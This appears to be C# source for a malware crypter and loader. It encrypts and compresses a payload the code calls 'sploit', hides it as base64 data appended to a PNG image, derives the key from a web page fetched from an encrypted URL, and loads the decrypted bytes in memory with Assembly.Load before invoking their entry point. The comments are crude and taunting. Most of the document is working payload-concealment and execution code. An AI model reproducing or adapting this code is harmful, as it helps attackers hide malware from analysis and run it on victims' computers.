public static byte[] stub_launch(byte[] url_data, string enc_pass, int png_offset, int pass_offset)
{ // this was NOT easy.
Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 }; //change
Byte[] b64_data_only = new Byte[url_data.Length - png_offset];
Buffer.BlockCopy(url_data, png_offset, b64_data_only, 0, url_data.Length - png_offset);
Byte[] comp_data = base64_decode(b64_data_only);
Byte[] enc_data = decompress_bin(comp_data);
int nn = enc_data[0] + (enc_data[1] << 8);
Byte[] enc_pre_pass = new Byte[nn];
Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
Byte[] url_pass = Enc.depadit(decrypted_url_pass);
int enc_data_offset = enc_pre_pass.Length + 2;
String nurl = Encoding.UTF8.GetString(url_pass);
Byte[] enc_page; if (test_file(nurl))
{
enc_page = File.ReadAllBytes(nurl);
}
else
{
enc_page = get_page(nurl);
}
Byte[] master_pass = hash_page(enc_page, pass_offset);
Byte[] pass = new Byte[0x20]; Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
Byte[] pass_4 = new Byte[0x10]; Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset];
Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); //moneyshot
return(decrypted_sploit_bytes);
}
public static byte[] decrypt_small_pass(String pass, byte[] data, byte[] salt)
{
var key = new Rfc2898DeriveBytes(pass, salt, 7195);//<--
byte[] out_data = Enc.aes_decrypt(data, key.GetBytes(16), salt);
return(out_data);
}
// lololol
public static string marshal_my_file(byte[] sploit_data, String url_pass, String enc_pass, int offset)
{
Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
debug_print("The orignal sploit data: {0}", sploit_data);
Byte[] url_pass_data;
if (test_file(url_pass))
{
url_pass_data = File.ReadAllBytes(url_pass);
}
else
{
url_pass_data = get_page(url_pass);
}
Byte[] bytesToBeEncrypted = new Byte[offset + sploit_data.Length];
if (offset != 0)
{
if (offset > url_pass_data.Length)
{
Console.WriteLine("Sorry your page is only {0} bytes long", url_pass_data.Length);
Environment.Exit(0);
}
// we also use the offset to add that many random bytes to the beginning..
Byte[] saltBytes = Enc.gen_random_bytes(offset);
for (int i = 0; i < saltBytes.Length; i++)
{
bytesToBeEncrypted[i] = saltBytes[i];
}
}
for (int i = 0; i < sploit_data.Length; i++)
{
bytesToBeEncrypted[i + offset] = sploit_data[i];
}
// end offset stuff
// encrypt the url now, as we need that.
Byte[] url_pass_inbytes = Encoding.UTF8.GetBytes(url_pass);
debug_print("The url_pass_inbytes: {0}", url_pass_inbytes);
Byte[] url_pass_padded = Enc.padit(url_pass_inbytes);
debug_print("The url_pass_padded: {0}", url_pass_padded);
debug_print("The salt we are using {0}", salt);
Byte[] encrypted_url_pass = Enc.encrypt_small_pass(enc_pass, url_pass_padded, salt);
debug_print("The encrypted_url_pass: {0}", encrypted_url_pass);
Byte[] master_password = hash_page(url_pass_data, offset);
debug_print("The master_password/hash from url page {0}", master_password);
// I HATE doing it like this but meh...
Byte[] pass = new byte[0x20];
Byte[] pass_4 = new byte[0x10];
Array.Copy(master_password, master_password.Length / 4, pass, 0, master_password.Length / 2);
Array.Copy(master_password, master_password.Length / 8, pass_4, 0, master_password.Length / 4);
debug_print("Password Is: {0}", pass);
debug_print("The IV Is: {0}", pass_4);
Byte[] encrypted_sploit_bytes = Enc.aes_encrypt(sploit_data, pass, pass_4);
debug_print("Our encrypted file is: {0}", encrypted_sploit_bytes);
// we COULD xor it here, but im not going to bother
// we need to append the encrypted_url_pass, to our encrypted_sploit_bytes..
// we could also come up with a nifty method here, for now its already to complicated and my head hurts....
Byte[] all_encrypted = new Byte[encrypted_url_pass.Length + encrypted_sploit_bytes.Length + 2]; // 2 bytes for length
// c++ lol incase its longer than 255, we need 2 bytes
all_encrypted[0] = (Byte)(encrypted_url_pass.Length & 255);
all_encrypted[1] = (Byte)(encrypted_url_pass.Length >> 8);
// int url_length = all_encrypted[0] + (all_encrypted[1] << 8); // the reverse!
Array.Copy(encrypted_url_pass, 0, all_encrypted, 2, encrypted_url_pass.Length); // start at 2
Array.Copy(encrypted_sploit_bytes, 0, all_encrypted, encrypted_url_pass.Length + 2, encrypted_sploit_bytes.Length);
debug_print("The size of all_encrypted {0}", all_encrypted.Length.ToString());
debug_print("The url encrypted pass and data: {0}", all_encrypted);
// assuming everything went well lets compress it
Byte[] compressed_sploit = compress_bin(all_encrypted);
debug_print("Our compressed file: {0}", compressed_sploit);
String b64_sploit = base64_encode(compressed_sploit);
debug_print("Our base64 file: {0}", b64_sploit);
return(b64_sploit);
}
// test our final image to veryify its working!
public static void test_everything(string output_file, string enc_pass, int offset, byte[] b64_test, string[] main_args, int code_position)
{
Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
Console.WriteLine("We are debugging it to make sure everything works properly!");
Byte[] enc_testdata = File.ReadAllBytes(output_file);
//int pos = do_png(enc_testdata);
//pos = pos + 37; // header length is 37
int pos = code_position;
Byte[] b64_data_only = new Byte[enc_testdata.Length - pos];
Buffer.BlockCopy(enc_testdata, pos, b64_data_only, 0, enc_testdata.Length - pos);
debug_print("TESTING, base64 data {0}", b64_data_only);
Byte[] comp_data = base64_decode(b64_data_only);
Byte[] enc_data = decompress_bin(comp_data);
// the length of the url, stored as Int16
int nn = enc_data[0] + (enc_data[1] << 8);
Byte[] enc_pre_pass = new Byte[nn];
Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
Byte[] url_pass = Enc.depadit(decrypted_url_pass);
// the offset is our enc data minus the url
int enc_data_offset = enc_pre_pass.Length + 2;
String nurl = Encoding.UTF8.GetString(url_pass);
// get file or webpage for encryption
Byte[] enc_page;
if (test_file(nurl))
{
enc_page = File.ReadAllBytes(nurl);
}
else
{
enc_page = get_page(nurl);
}
Byte[] master_pass = hash_page(enc_page, offset);
debug_print("Our testing master_pass {0}", master_pass);
// I HATE doing it like this but meh...
Byte[] pass = new Byte[0x20];
Byte[] pass_4 = new Byte[0x10];
Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
debug_print("Password Is: {0}", pass);
debug_print("The IV Is: {0}", pass_4);
Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset]; // get ready for the money shot
Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4);
debug_print("Our encrypted file is: {0}", decrypted_sploit_bytes);
Console.WriteLine("Everything should have worked, loading the binary.");
// load the bytes into Assembly
Assembly a = Assembly.Load(decrypted_sploit_bytes);
// search for the Entry Point
MethodInfo method = a.EntryPoint;
if (method != null)
{
// GlobalAssemblyCache <-- ????
// create an istance of the Startup form Main method
Object o = a.CreateInstance(method.Name);
// copy main_args into new array, to use in object
String[] prog_args = new String[main_args.Length - 1]; // adjust this if we use more args!
Array.Copy(main_args, 1, prog_args, 0, main_args.Length - 1);
try
{
// invoke the application starting point
method.Invoke(o, new Object[] { prog_args }); // all over her face
}
catch (Exception e)
{
Console.WriteLine(e);
}
}
}
